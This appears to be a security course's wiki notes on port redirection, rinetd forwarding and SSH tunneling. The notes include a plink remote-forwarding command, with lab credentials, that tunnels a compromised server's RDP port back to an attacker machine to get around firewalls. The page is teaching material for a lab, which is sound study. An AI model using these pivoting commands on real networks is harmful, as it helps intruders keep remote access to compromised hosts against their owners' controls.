Port Redirection - Paiet/SEC-335 GitHub Wiki
-
Port Redirection is the process of proxying data from one service through a port other than the default/configured.
- Send HTTP through port 53
- Send SSH through port 33445
-
Bypasses firewall restrictions
- Firewall only allows port 80 and 443 (HTTP/HTTPS)
- You want to RDP (port 3389) into a Web Server you compromised
-
Tunneling
- Encapsulate one protocol within a another/different protocol
-
Port Forwarding
- Used to bypass restrictions by forwarding data through a proxy server
- Simple Diagram
- Setup
-
Proxy server running rinetd
-
Configure /etc/rinetd.conf
- Under line: # bindaddress bindport connectaddress connectport
- Add line: 192.168.219.146 2222 192.168.219.158 80
-
(proxy address/port) (desired Server address/port)
-
service rinetd restart- Do this after EVERY change to /etc/rinetd.conf
-
- From Apple client browser
- http://192.168.219.146:2222
- You should see the homepage of the desired web site :)
-
SSH Tunneling
- Kind of like port forwarding, but using SSH
- Bind an egress allowed, local port to the address:port of a desired server being that is being blocked
- Then connect, using SSH, to a proxy
- The proxy forwards the client requests to desired/blocked server
- Host connects to the egress allowed local port and receives data delivered from proxy
- Because using SSH...ALL TRAFFIC IS ENCRYPTED! :)
- Then connect, using SSH, to a proxy
- This sounds like witchcraft, but it does work
- Configure proxy with SSH, using port that client's firewall doesn't block
- The default port (22) may not be being blocked
- Connect from the client
ssh (user@proxy-ip [-p if using non-default port] -L[local bind port] 8080:[desired-ip:port])
- Using standard SSH port 22
ssh [email protected] -L 8080:192.168.219.158:80
- Using non-standard SSH port 2222
ssh [email protected] -p 2222 -L 8080:192.168.219.158:80
- Configure proxy with SSH, using port that client's firewall doesn't block
-
Remote Port Forwarding w/SSH
- Done from a compromised system
- Allows you to connect to services local to compromised system that are firewalled from outside that local network
- Services like Remote Desktop might not be accessible from remote networks
- How is this voodoo accomplished?
- Simple Diagram
- You bind the desired service port of the compromised server to the desired remote port of the attacking machine using SSH client
- When attack machine accesses its own bound local port, it is forwarded to the compromised server's bound port
- You bind the desired service port of the compromised server to the desired remote port of the attacking machine using SSH client
- Connect to compromised server
- Fire up ssh client
- Simple Diagram
-
plink -l user -pw password attacker-ip -R attkBindPort:127.0.0.1:localBindPort -
plink -l ftp2 -pw P@ssw0rd1 192.168.219.146 -R 3388:127.0.0.1:3389- From Attacker Machine
rdesktop 127.0.0.1:3388- You are now forwarding RDP from your compromised web server to your attacking machine through SSH
- From Attacker Machine